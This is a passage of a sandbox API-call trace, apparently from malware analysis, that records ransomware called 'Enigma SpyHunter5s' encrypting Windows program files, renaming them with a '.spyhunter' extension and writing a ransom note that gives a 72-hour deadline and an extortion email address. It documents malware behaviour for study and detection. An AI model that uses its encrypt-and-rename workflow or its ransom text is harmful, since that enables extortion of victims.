(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0122.191] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f8e8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f8e8*=0x2ac, lpOverlapped=0x0) returned 1 [0122.192] CloseHandle (hObject=0xb4) returned 1 [0122.192] GetProcessHeap () returned 0x2c0000 [0122.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4630 | out: hHeap=0x2c0000) returned 1 [0122.195] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f878 | out: pbBuffer=0x57f878) returned 1 [0122.195] GetProcessHeap () returned 0x2c0000 [0122.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.195] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f870*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f870*=0x30) returned 1 [0122.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0122.197] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 95 [0122.197] StrStrW (lpFirst="FPWEC.DLL", lpSrch=".txt") returned 0x0 [0122.197] GetProcessHeap () returned 0x2c0000 [0122.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0122.197] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f834, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f834*=0x2800, lpOverlapped=0x0) returned 1 [0122.198] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.198] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f834, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f834*=0x2800, lpOverlapped=0x0) returned 1 [0122.199] GetProcessHeap () returned 0x2c0000 [0122.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0122.199] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.199] WriteFile (in: hFile=0xb4, lpBuffer=0x57f874*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f834, lpOverlapped=0x0 | out: lpBuffer=0x57f874*, lpNumberOfBytesWritten=0x57f834*=0x4, lpOverlapped=0x0) returned 1 [0122.233] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f834, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f834*=0x30, lpOverlapped=0x0) returned 1 [0122.233] CloseHandle (hObject=0xb4) returned 1 [0122.549] GetProcessHeap () returned 0x2c0000 [0122.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0122.549] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.spyhunter") returned 105 [0122.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll.spyhunter")) returned 1 [0122.550] GetProcessHeap () returned 0x2c0000 [0122.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0122.550] GetProcessHeap () returned 0x2c0000 [0122.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.550] GetProcessHeap () returned 0x2c0000 [0122.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e608 | out: hHeap=0x2c0000) returned 1 [0122.550] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f878 | out: pbBuffer=0x57f878) returned 1 [0122.550] GetProcessHeap () returned 0x2c0000 [0122.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f870*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f870*=0x30) returned 1 [0122.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.554] GetProcessHeap () returned 0x2c0000 [0122.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.555] GetProcessHeap () returned 0x2c0000 [0122.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03b58 | out: hHeap=0x2c0000) returned 1 [0122.555] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f870 | out: pbBuffer=0x57f870) returned 1 [0122.555] GetProcessHeap () returned 0x2c0000 [0122.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.555] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f868*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f868*=0x30) returned 1 [0122.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.556] GetProcessHeap () returned 0x2c0000 [0122.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.556] GetProcessHeap () returned 0x2c0000 [0122.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03818 | out: hHeap=0x2c0000) returned 1 [0122.557] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f870 | out: pbBuffer=0x57f870) returned 1 [0122.557] GetProcessHeap () returned 0x2c0000 [0122.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.557] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f868*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f868*=0x30) returned 1 [0122.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.563] GetProcessHeap () returned 0x2c0000 [0122.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.563] GetProcessHeap () returned 0x2c0000 [0122.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfec0 | out: hHeap=0x2c0000) returned 1 [0122.563] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f868 | out: pbBuffer=0x57f868) returned 1 [0122.563] GetProcessHeap () returned 0x2c0000 [0122.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.563] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f860*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f860*=0x30) returned 1 [0122.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.574] GetProcessHeap () returned 0x2c0000 [0122.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.574] GetProcessHeap () returned 0x2c0000 [0122.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfd30 | out: hHeap=0x2c0000) returned 1 [0122.574] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f868 | out: pbBuffer=0x57f868) returned 1 [0122.574] GetProcessHeap () returned 0x2c0000 [0122.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.574] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f860*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f860*=0x30) returned 1 [0122.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.576] GetProcessHeap () returned 0x2c0000 [0122.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.576] GetProcessHeap () returned 0x2c0000 [0122.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4b70 | out: hHeap=0x2c0000) returned 1 [0122.576] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f860 | out: pbBuffer=0x57f860) returned 1 [0122.576] GetProcessHeap () returned 0x2c0000 [0122.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.576] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f858*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f858*=0x30) returned 1 [0122.576] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.577] GetProcessHeap () returned 0x2c0000 [0122.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.577] GetProcessHeap () returned 0x2c0000 [0122.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee49b0 | out: hHeap=0x2c0000) returned 1 [0122.577] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f860 | out: pbBuffer=0x57f860) returned 1 [0122.577] GetProcessHeap () returned 0x2c0000 [0122.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.577] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f858*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f858*=0x30) returned 1 [0122.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.577] GetProcessHeap () returned 0x2c0000 [0122.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.577] GetProcessHeap () returned 0x2c0000 [0122.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee48d0 | out: hHeap=0x2c0000) returned 1 [0122.577] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f858 | out: pbBuffer=0x57f858) returned 1 [0122.577] GetProcessHeap () returned 0x2c0000 [0122.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.577] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f850*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f850*=0x30) returned 1 [0122.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.578] GetProcessHeap () returned 0x2c0000 [0122.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.578] GetProcessHeap () returned 0x2c0000 [0122.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee47f0 | out: hHeap=0x2c0000) returned 1 [0122.578] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f858 | out: pbBuffer=0x57f858) returned 1 [0122.578] GetProcessHeap () returned 0x2c0000 [0122.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.578] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f850*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f850*=0x30) returned 1 [0122.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.578] GetProcessHeap () returned 0x2c0000 [0122.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.578] GetProcessHeap () returned 0x2c0000 [0122.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf948 | out: hHeap=0x2c0000) returned 1 [0122.578] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f850 | out: pbBuffer=0x57f850) returned 1 [0122.578] GetProcessHeap () returned 0x2c0000 [0122.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.579] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f848*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f848*=0x30) returned 1 [0122.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.579] GetProcessHeap () returned 0x2c0000 [0122.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.579] GetProcessHeap () returned 0x2c0000 [0122.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf880 | out: hHeap=0x2c0000) returned 1 [0122.579] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f850 | out: pbBuffer=0x57f850) returned 1 [0122.579] GetProcessHeap () returned 0x2c0000 [0122.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.579] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f848*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f848*=0x30) returned 1 [0122.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.583] GetProcessHeap () returned 0x2c0000 [0122.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.583] GetProcessHeap () returned 0x2c0000 [0122.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf7b8 | out: hHeap=0x2c0000) returned 1 [0122.583] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f848 | out: pbBuffer=0x57f848) returned 1 [0122.583] GetProcessHeap () returned 0x2c0000 [0122.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.583] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f840*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f840*=0x30) returned 1 [0122.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0122.584] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\desktop.ini") returned 38 [0122.584] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0122.584] GetProcessHeap () returned 0x2c0000 [0122.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0122.584] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f804, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f804*=0xae, lpOverlapped=0x0) returned 1 [0122.584] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.584] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x57f804, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f804*=0xae, lpOverlapped=0x0) returned 1 [0122.585] GetProcessHeap () returned 0x2c0000 [0122.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0122.585] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.585] WriteFile (in: hFile=0x16c, lpBuffer=0x57f844*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f804, lpOverlapped=0x0 | out: lpBuffer=0x57f844*, lpNumberOfBytesWritten=0x57f804*=0x4, lpOverlapped=0x0) returned 1 [0122.585] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f804, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f804*=0x30, lpOverlapped=0x0) returned 1 [0122.585] CloseHandle (hObject=0x16c) returned 1 [0122.585] GetProcessHeap () returned 0x2c0000 [0122.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0122.585] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\desktop.ini.spyhunter") returned 48 [0122.585] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\desktop.ini.spyhunter" (normalized: "c:\\program files (x86)\\desktop.ini.spyhunter")) returned 1 [0122.586] GetProcessHeap () returned 0x2c0000 [0122.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0122.586] GetProcessHeap () returned 0x2c0000 [0122.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.586] GetProcessHeap () returned 0x2c0000 [0122.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321598 | out: hHeap=0x2c0000) returned 1 [0122.586] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0122.586] WriteFile (in: hFile=0x16c, lpBuffer=0x57f77b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x57f77b*, lpNumberOfBytesWritten=0x57f8a4*=0x127, lpOverlapped=0x0) returned 1 [0122.587] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0122.587] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f8a4*=0x2ac, lpOverlapped=0x0) returned 1 [0122.587] CloseHandle (hObject=0x16c) returned 1 [0122.588] GetProcessHeap () returned 0x2c0000 [0122.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f580 | out: hHeap=0x2c0000) returned 1 [0122.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f840 | out: pbBuffer=0x57f840) returned 1 [0122.589] GetProcessHeap () returned 0x2c0000 [0122.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.589] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f838*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f838*=0x30) returned 1 [0122.589] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files (x86)\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.589] GetProcessHeap () returned 0x2c0000 [0122.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.589] GetProcessHeap () returned 0x2c0000 [0122.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f280 | out: hHeap=0x2c0000) returned 1 [0122.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f838 | out: pbBuffer=0x57f838) returned 1 [0122.589] GetProcessHeap () returned 0x2c0000 [0122.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.589] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, 